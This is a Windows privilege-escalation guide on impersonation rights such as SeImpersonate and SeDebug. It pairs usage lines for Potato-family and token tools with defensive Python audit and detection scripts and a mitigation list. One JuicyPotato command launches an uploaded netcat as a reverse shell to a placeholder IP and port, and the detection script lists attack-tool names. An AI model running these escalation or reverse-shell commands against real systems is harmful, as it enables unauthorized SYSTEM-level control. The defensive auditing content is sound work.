EoP - Impersonation Privileges

Impersonation privileges in Windows systems allow processes or users to assume the identity of another user. This capability can be exploited for privilege escalation (EoP), enabling attackers to execute code with higher privileges, often leading to complete control over the system. Below, we outline key impersonation privileges, tools, execution paths, and related remarks to help security professionals understand and mitigate these threats.


| Privilege | Impact | Tool | Execution Path | Remarks |
| --- | --- | --- | --- | --- |
| SeAssignPrimaryToken | Admin | 3rd Party Tool | potato.exe, rottenpotato.exe, juicypotato.exe | Allows users to impersonate tokens, escalating privileges to NT AUTHORITY\SYSTEM. Useful for reading memory dumps (%WINDIR%\MEMORY.DMP). |
| SeBackupPrivilege | SeBackup | Built-in Commands | robocopy /b | Enables reading of sensitive files, especially useful for accessing open files. Requires both SeBackup and SeRestore. |
| SeCreateToken | Admin | 3rd Party Tool | NtCreateToken | Creates arbitrary tokens, potentially granting local admin rights. |
| SeDebugPrivilege | Admin | PowerShell | Duplicate lsass.exe token | Allows duplicating the LSASS token to escalate privileges. A script can be found on FuzzySecurity. |
| SeLoadDriver | Admin | 3rd Party Tool | Load buggy drivers like szkg64.sys, capcom.sys | Exploits driver vulnerabilities to gain elevated privileges. The szkg64 vulnerability is listed as CVE-2018-15732. |
| SeRestorePrivilege | Admin | PowerShell | Enable-SeRestorePrivilege | Allows renaming system binaries, e.g., renaming utilman.exe to cmd.exe. Can trigger AV detections. |
| SeTakeOwnership | Admin | Built-in Commands | takeown.exe | Takes ownership of files/directories, allowing modification of critical system files. |
| SeTcbPrivilege | Admin | 3rd Party Tool | Token manipulation | Allows manipulation of tokens to include local admin rights. May require SeImpersonate. |

Impersonation Privileges and Exploitation Techniques in Windows

Overview

Windows impersonation privileges allow processes or users to assume the identity of another user, which is often exploited to achieve Elevation of Privilege (EoP). Attackers leverage these privileges to execute code with NT AUTHORITY\SYSTEM rights, gaining full control of the system. Below is a detailed outline of impersonation tools, techniques, and mitigation strategies.


Key Impersonation Privileges

  1. SeImpersonatePrivilege: Allows a process to impersonate a client after authentication.

  2. SeAssignPrimaryTokenPrivilege: Enables assigning a primary token to a new process, useful for impersonating SYSTEM.
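Both rights are granted through User Rights Assignment in the local security policy, so the first defensive question is which principals actually hold them. The script below is an added illustration, not code from the original page: it parses the [Privilege Rights] section of a security template exported with `secedit /export /cfg <file> /areas USER_RIGHTS` and reports any holder of SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege outside an expected baseline, which is the audit that the Limit Privileges mitigation later on this page asks for. The export text, the domain SID S-1-5-21-1000-2000-3000-1105 and the baseline sets are constructed assumptions for the example.

```python
"""Audit which principals hold the impersonation-related user rights.

Parses the [Privilege Rights] section of a template exported with
`secedit /export /cfg <file> /areas USER_RIGHTS` and reports holders of
SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege that fall outside
an expected baseline. The export below is a constructed sample, not a real host.
"""

# Rights named on this page that matter for impersonation-based EoP.
WATCHED_RIGHTS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

# Well-known SIDs as secedit writes them (each prefixed with '*' in the file).
WELL_KNOWN = {
    "S-1-5-6": "NT AUTHORITY\\SERVICE",
    "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
    "S-1-5-32-544": "BUILTIN\\Administrators",
}

# Expected holders per right. Assumption: this matches the stock Windows
# assignment; adjust it for hosts that legitimately add more (e.g. IIS_IUSRS).
BASELINE = {
    "SeImpersonatePrivilege": {"S-1-5-6", "S-1-5-19", "S-1-5-20", "S-1-5-32-544"},
    "SeAssignPrimaryTokenPrivilege": {"S-1-5-19", "S-1-5-20"},
}

# Constructed export: a domain principal (S-1-5-21-...-1105) has been granted
# both impersonation rights on top of the baseline.
SAMPLE_EXPORT = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeImpersonatePrivilege = *S-1-5-6,*S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-21-1000-2000-3000-1105
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-21-1000-2000-3000-1105
SeDebugPrivilege = *S-1-5-32-544
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_privilege_rights(text):
    """Return {right_name: set(SIDs)} from the [Privilege Rights] section only."""
    rights = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("["):
            # Section header: track whether we are inside [Privilege Rights].
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, value = line.partition("=")
        # Each holder is written as '*<SID>'; drop the marker and whitespace.
        sids = {v.strip().lstrip("*") for v in value.split(",") if v.strip()}
        rights[name.strip()] = sids
    return rights


def find_unexpected_holders(rights, baseline=BASELINE):
    """Return {right: sorted SIDs} for watched rights granted beyond the baseline."""
    findings = {}
    for right in WATCHED_RIGHTS:
        extra = rights.get(right, set()) - baseline.get(right, set())
        if extra:
            findings[right] = sorted(extra)
    return findings


def describe(sid):
    """Map a well-known SID to its name; unknown SIDs are echoed back."""
    return WELL_KNOWN.get(sid, sid)


if __name__ == "__main__":
    parsed = parse_privilege_rights(SAMPLE_EXPORT)
    for right, sids in find_unexpected_holders(parsed).items():
        holders = ", ".join(describe(s) for s in sids)
        print(f"{right}: unexpected holders -> {holders}")
```

A real secedit export is written as UTF-16, so read the file with `encoding="utf-16"` before passing it to `parse_privilege_rights`; the baseline is deliberately a plain set so that site-specific service accounts can be added to it rather than silently tolerated.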


Impersonation Tools and Techniques

1. Potato Variants

RottenPotato

  • Description: Exploits SeAssignPrimaryToken to impersonate NT AUTHORITY\SYSTEM.

  • Usage:

    rot.exe -Hc
    impersonate_token "NT AUTHORITY\SYSTEM"

JuicyPotato

  • Description: Uses COM object abuse to escalate privileges with SeImpersonate or SeAssignPrimaryToken.

  • Source: Juicy-Potato

  • Usage:

    JuicyPotato.exe -l 9999 -p "C:\inetpub\wwwroot\upload\nc.exe" -a "IP PORT -e"

2. RoguePotato

  • Description: Exploits a fake OXID resolver to perform SYSTEM impersonation.

  • Source: RoguePotato

  • Usage:

    RoguePotato.exe -l 9999 -c "C:\windows\system32\cmd.exe"

3. EFSPotato

  • Description: Utilizes EFS RPC (Encrypting File System Remote Procedure Call) for privilege escalation.

  • Source: MS-EFSR

  • Compilation:

    csc EfsPotato.cs

Using Meterpreter for Privilege Escalation

Meterpreter provides built-in commands for privilege escalation.

  • Command to Get SYSTEM Privileges:

    meterpreter> getsystem

Alternative Tools

1. Tokenvator

  • Description: Exploits impersonation and token manipulation to escalate privileges.

  • Usage:

    Tokenvator.exe getsystem cmd.exe

2. Incognito

  • Description: Facilitates token manipulation to execute commands as NT AUTHORITY\SYSTEM.

  • Usage:

    incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe

Potential Risks

  • Full System Control: Successful exploitation grants complete control over system resources.

  • Data Exfiltration: Access to sensitive data, including system hives, user credentials, and protected files.

  • Persistence: Attackers can establish backdoors or scheduled tasks under SYSTEM privileges.

  • Service Manipulation: Modify, disable, or create system services.


Mitigation Strategies

1. Limit Privileges

  • Restrict SeImpersonate and SeAssignPrimaryToken privileges to only essential services.

  • Regularly audit accounts and processes with these privileges.

2. Monitor Impersonation Activity

  • Enable advanced auditing for token manipulation and privilege usage.

  • Use Sysmon to monitor and log suspicious process behaviors involving impersonation tools.

3. Implement Application Whitelisting

  • Use AppLocker or Windows Defender Application Control (WDAC) to block unauthorized binaries, including impersonation tools.

4. Regular Patching and Updates

  • Keep Windows and related services updated to address known vulnerabilities exploited by tools like JuicyPotato and RoguePotato.

5. Endpoint Detection and Response (EDR)

  • Deploy EDR solutions to detect exploitation attempts involving impersonation tools.

  • Monitor for abnormal usage patterns of legitimate binaries (e.g., cmd.exe, powershell.exe).
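As an added example (not code from the original page or from any tool it lists), the Python below implements two of the checks described under Monitor Impersonation Activity and EDR and runs them over constructed event records: Security event 4672 logons that hold SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege under an account outside an expected set, and Sysmon process-creation events where a SYSTEM process was spawned by a parent running as a lower-privileged user, or where a process name matches one of the tool binaries on this page. The event records, the account names and the paths are constructed; the ParentUser field assumes a Sysmon version that records it.

```python
"""Detection logic for impersonation-based EoP over constructed event records.

Two sources are modelled as plain dicts: Windows Security event 4672 (special
privileges assigned to a new logon) and Sysmon event 1 (process creation).
All records below are constructed for this example; field names follow the
event schemas, and the Sysmon rule assumes a version that records ParentUser.
"""

# Accounts expected to log on holding impersonation rights (assumption:
# extend with known service accounts for the host).
EXPECTED_IMPERSONATORS = {"SYSTEM", "LOCAL SERVICE", "NETWORK SERVICE"}
WATCHED_RIGHTS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")
SYSTEM_USER = "NT AUTHORITY\\SYSTEM"

# Tool binaries named on this page. A filename match is a weak indicator
# (a renamed binary defeats it), so the privilege-jump rule does not rely on it.
KNOWN_TOOLS = {"potato.exe", "rottenpotato.exe", "juicypotato.exe",
               "roguepotato.exe", "efspotato.exe", "tokenvator.exe", "incognito.exe"}

# Constructed sample events: one benign and one suspicious 4672, then a benign
# service start, a SYSTEM shell spawned from an IIS app-pool context, and an
# ordinary user process.
SAMPLE_EVENTS = [
    {"Source": "Security", "EventID": 4672, "SubjectUserName": "NETWORK SERVICE",
     "PrivilegeList": "SeAssignPrimaryTokenPrivilege SeImpersonatePrivilege"},
    {"Source": "Security", "EventID": 4672, "SubjectUserName": "svc_webapp",
     "PrivilegeList": "SeImpersonatePrivilege"},
    {"Source": "Sysmon", "EventID": 1, "Image": "C:\\Windows\\System32\\svchost.exe",
     "User": SYSTEM_USER, "ParentImage": "C:\\Windows\\System32\\services.exe",
     "ParentUser": SYSTEM_USER},
    {"Source": "Sysmon", "EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe",
     "User": SYSTEM_USER, "ParentImage": "C:\\inetpub\\wwwroot\\upload\\JuicyPotato.exe",
     "ParentUser": "IIS APPPOOL\\DefaultAppPool"},
    {"Source": "Sysmon", "EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe",
     "User": "CORP\\alice", "ParentImage": "C:\\Windows\\explorer.exe",
     "ParentUser": "CORP\\alice"},
]


def _basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_special_logon(ev):
    """4672: an account outside the expected set logged on with a watched right."""
    if ev.get("EventID") != 4672:
        return None
    granted = set(ev.get("PrivilegeList", "").split())
    hits = [r for r in WATCHED_RIGHTS if r in granted]
    if hits and ev.get("SubjectUserName") not in EXPECTED_IMPERSONATORS:
        return {"rule": "unexpected-impersonation-logon",
                "account": ev["SubjectUserName"], "rights": hits}
    return None


def check_process_create(ev):
    """Sysmon 1: a SYSTEM process whose parent ran as a lower-privileged user,
    and/or a process or parent whose file name matches a tool on this page."""
    if ev.get("EventID") != 1:
        return None
    reasons = []
    parent_user = ev.get("ParentUser")  # None on Sysmon builds without the field
    if ev.get("User") == SYSTEM_USER and parent_user not in (None, SYSTEM_USER):
        reasons.append("parent-to-child privilege jump")
    if (_basename(ev.get("ParentImage", "")) in KNOWN_TOOLS
            or _basename(ev.get("Image", "")) in KNOWN_TOOLS):
        reasons.append("known tool name")
    if reasons:
        return {"rule": "suspicious-system-process", "image": ev["Image"],
                "parent": ev["ParentImage"], "reasons": reasons}
    return None


def run_detections(events):
    """Apply every check to every event and collect the findings in order."""
    findings = []
    for ev in events:
        for check in (check_special_logon, check_process_create):
            finding = check(ev)
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in run_detections(SAMPLE_EVENTS):
        print(f)
```

The privilege-jump rule is the one worth keeping when tool names change: a process running as NT AUTHORITY\SYSTEM whose parent ran under a service or application-pool identity is the shape every technique on this page produces. It will also fire for some legitimate installers and management agents, so tune the parent-image and parent-user pairs per environment rather than suppressing the rule.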


Conclusion

Impersonation privileges provide attackers with a powerful means of achieving privilege escalation. Security professionals must understand the tools and techniques used in impersonation attacks and apply robust mitigation strategies to safeguard their environments.
